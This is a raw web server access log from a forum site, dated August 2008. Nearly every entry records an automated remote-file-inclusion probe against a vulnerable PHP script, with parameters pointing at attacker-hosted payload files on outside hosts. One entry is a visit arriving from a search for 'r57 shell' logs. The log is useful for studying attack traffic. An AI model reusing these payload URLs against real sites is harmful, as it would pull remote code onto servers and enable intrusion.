194.79.75.195 - - [10/Aug/2008:17:05:39 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.collegiateforum.org"
194.79.75.195 - - [10/Aug/2008:17:05:39 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.collegiateforum.org"
98.150.49.133 - - [10/Aug/2008:17:05:47 -0700] "GET / HTTP/1.0" 200 918 "http://www.collegiateforum.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:17:06:01 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:17:06:02 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:17:06:21 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:17:06:22 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
77.221.130.15 - - [10/Aug/2008:17:07:56 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
129.142.67.13 - - [10/Aug/2008:17:09:39 -0700] "GET //vwar/backup/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
129.142.67.13 - - [10/Aug/2008:17:09:39 -0700] "GET //vwar/convert/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:17:13:49 -0700] "GET /logs/access_080407.log//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:17:16:15 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:17:16:16 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
70.85.201.66 - - [10/Aug/2008:17:17:18 -0700] "GET /logs/access_080324.log//oneadmin/newspublish/include.php?path[docroot]=http://go4wallpapers.com/babes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
70.85.201.66 - - [10/Aug/2008:17:17:18 -0700] "GET //oneadmin/newspublish/include.php?path[docroot]=http://go4wallpapers.com/babes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
70.85.201.66 - - [10/Aug/2008:17:17:18 -0700] "GET /logs//oneadmin/newspublish/include.php?path[docroot]=http://go4wallpapers.com/babes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
151.1.210.219 - - [10/Aug/2008:17:21:35 -0700] "GET /logs//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
151.1.210.219 - - [10/Aug/2008:17:21:36 -0700] "GET //include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:17:22:38 -0700] "GET /logs//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:17:22:39 -0700] "GET //include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:17:28:02 -0700] "GET /logs//include/write.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:17:28:03 -0700] "GET //include/write.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:17:28:28 -0700] "GET /logs/access_080121.log/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:17:28:28 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:17:28:28 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:17:28:28 -0700] "GET /logs/access_080121.log/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:17:28:28 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:17:28:29 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:17:29:12 -0700] "GET /logs/access_080121.log/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:17:29:12 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:17:29:12 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:17:29:43 -0700] "GET /logs/access_080204.log/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:17:29:44 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:17:29:44 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
210.188.205.31 - - [10/Aug/2008:17:30:19 -0700] "GET /logs/access_080121.log/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
210.188.205.31 - - [10/Aug/2008:17:30:19 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
210.188.205.31 - - [10/Aug/2008:17:30:20 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:17:30:57 -0700] "GET /logs/access_080204.log/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:17:31:16 -0700] "GET /logs/access_080204.log/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:17:31:17 -0700] "GET /logs/access_080204.log/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
82.192.70.11 - - [10/Aug/2008:17:31:33 -0700] "GET //htmltonuke.php?http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.collegiateforum.org"
210.188.205.31 - - [10/Aug/2008:17:32:21 -0700] "GET /logs/access_080204.log/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
210.188.205.31 - - [10/Aug/2008:17:32:22 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
210.188.205.31 - - [10/Aug/2008:17:32:23 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:17:32:56 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
210.188.205.31 - - [10/Aug/2008:17:33:39 -0700] "GET /logs/access_080204.log/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
202.70.83.4 - - [10/Aug/2008:17:34:51 -0700] "GET /logs//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
202.70.83.4 - - [10/Aug/2008:17:34:52 -0700] "GET //include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
151.1.210.219 - - [10/Aug/2008:17:36:44 -0700] "GET //include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
217.20.89.210 - - [10/Aug/2008:17:39:01 -0700] "GET /logs/access_080204.log/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.20.89.210 - - [10/Aug/2008:17:39:08 -0700] "GET /errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
217.20.89.210 - - [10/Aug/2008:17:39:08 -0700] "GET /logs/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
82.192.70.11 - - [10/Aug/2008:17:39:52 -0700] "GET /logs/access.log//htmltonuke.php?http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "collegiateforum.org"
82.192.70.11 - - [10/Aug/2008:17:39:57 -0700] "GET //htmltonuke.php?http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "collegiateforum.org"
82.192.70.11 - - [10/Aug/2008:17:40:02 -0700] "GET /logs//htmltonuke.php?http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "collegiateforum.org"
72.29.70.187 - - [10/Aug/2008:17:40:10 -0700] "GET /logs/access_080331.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
72.29.70.187 - - [10/Aug/2008:17:40:11 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
72.29.70.187 - - [10/Aug/2008:17:40:11 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
72.29.70.187 - - [10/Aug/2008:17:40:25 -0700] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "collegiateforum.org"
72.29.70.187 - - [10/Aug/2008:17:40:25 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "collegiateforum.org"
72.29.70.187 - - [10/Aug/2008:17:40:25 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "collegiateforum.org"
125.24.33.188 - - [10/Aug/2008:17:40:56 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
125.24.33.188 - - [10/Aug/2008:17:40:58 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
125.24.33.188 - - [10/Aug/2008:17:41:00 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:17:41:17 -0700] "GET /logs/access_080204.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:17:41:17 -0700] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:17:41:21 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:17:41:21 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:17:41:21 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
72.29.70.187 - - [10/Aug/2008:17:42:12 -0700] "GET /logs/access_080331.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
72.29.70.187 - - [10/Aug/2008:17:42:12 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
72.29.70.187 - - [10/Aug/2008:17:42:12 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:17:42:33 -0700] "GET /logs/access_080505.log//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:17:42:33 -0700] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:17:42:33 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
72.29.70.187 - - [10/Aug/2008:17:42:48 -0700] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "collegiateforum.org"
72.29.70.187 - - [10/Aug/2008:17:42:48 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "collegiateforum.org"
72.29.70.187 - - [10/Aug/2008:17:42:48 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:17:42:49 -0700] "GET /logs/access.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:17:42:49 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:17:42:49 -0700] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
207.44.244.37 - - [10/Aug/2008:17:43:27 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.collegiateforum.org"
207.44.244.37 - - [10/Aug/2008:17:43:27 -0700] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:17:43:29 -0700] "GET /logs/access.log/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:17:43:29 -0700] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:17:43:29 -0700] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:17:43:29 -0700] "GET //include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
207.44.244.37 - - [10/Aug/2008:17:43:29 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "collegiateforum.org"
207.44.244.37 - - [10/Aug/2008:17:43:30 -0700] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "collegiateforum.org"
69.72.153.58 - - [10/Aug/2008:17:43:58 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.collegiateforum.org"
69.72.153.58 - - [10/Aug/2008:17:43:59 -0700] "GET /classes/core/language.php?rootdir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.collegiateforum.org"
69.72.153.58 - - [10/Aug/2008:17:44:01 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.collegiateforum.org"
69.72.153.58 - - [10/Aug/2008:17:44:03 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.collegiateforum.org"
81.169.158.65 - - [10/Aug/2008:17:46:24 -0700] "GET /logs/access_080331.log/errors.php?error=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
81.169.158.65 - - [10/Aug/2008:17:46:24 -0700] "GET /errors.php?error=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
81.169.158.65 - - [10/Aug/2008:17:46:24 -0700] "GET /logs/errors.php?error=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
62.169.0.50 - - [10/Aug/2008:17:47:35 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.collegiateforum.org"
62.169.0.50 - - [10/Aug/2008:17:47:35 -0700] "GET /htmltonuke.php?filnavn=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.collegiateforum.org"
62.169.0.50 - - [10/Aug/2008:17:48:18 -0700] "GET /htmltonuke.php?filnavn=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "collegiateforum.org"
62.169.0.50 - - [10/Aug/2008:17:48:18 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "collegiateforum.org"
88.224.35.3 - - [10/Aug/2008:17:48:20 -0700] "GET /logs/access_080407.log HTTP/1.1" 200 917504 "http://www.google.com.tr/search?hl=tr&q=r57+shell+filetype%3Alog&btnG=Google%27da+Ara&meta=" "Opera/9.50 (Windows NT 5.1; U; tr)" "www.collegiateforum.org"
81.169.158.65 - - [10/Aug/2008:17:50:00 -0700] "GET /logs/access_080324.log/errors.php?error=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
151.1.210.219 - - [10/Aug/2008:17:50:29 -0700] "GET /logs/access_080331.log//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
210.188.205.31 - - [10/Aug/2008:17:51:27 -0700] "GET /logs/access_080505.log//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
210.188.205.31 - - [10/Aug/2008:17:51:28 -0700] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
210.188.205.31 - - [10/Aug/2008:17:51:29 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:17:51:47 -0700] "GET /logs/access_080331.log//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:17:51:50 -0700] "GET /logs/access_080331.log//include/write.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:17:51:53 -0700] "GET /logs/access.log//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
89.111.172.23 - - [10/Aug/2008:17:51:53 -0700] "GET /logs//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:17:51:58 -0700] "GET /logs/access.log//include/write.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
